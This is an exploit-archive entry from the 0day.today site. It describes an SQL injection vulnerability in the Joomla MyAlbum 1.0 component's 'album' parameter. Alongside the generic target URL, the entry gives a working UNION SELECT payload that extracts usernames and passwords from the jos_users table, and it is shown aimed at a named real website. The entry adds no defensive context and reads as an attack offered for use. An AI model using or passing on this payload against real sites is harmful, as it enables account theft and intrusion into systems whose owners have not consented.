[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability

Author
parad0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2783
Category
web applications
Date add
28-03-2008
Platform
unsorted
================================================================
Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
================================================================



-------------------------------------------------------------------------------------------------
# Title   :  Joomla Component MyAlbum SQL Injection Vulnerability
# Author  :  parad0x
# D.Page  :  http://joomlacode.org/gf/project/myalbum/
-------------------------------------------------------------------------------------------------
http://[target]/index.php?option=com_myalbum&album=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------



#  0day.today [2024-12-26]  #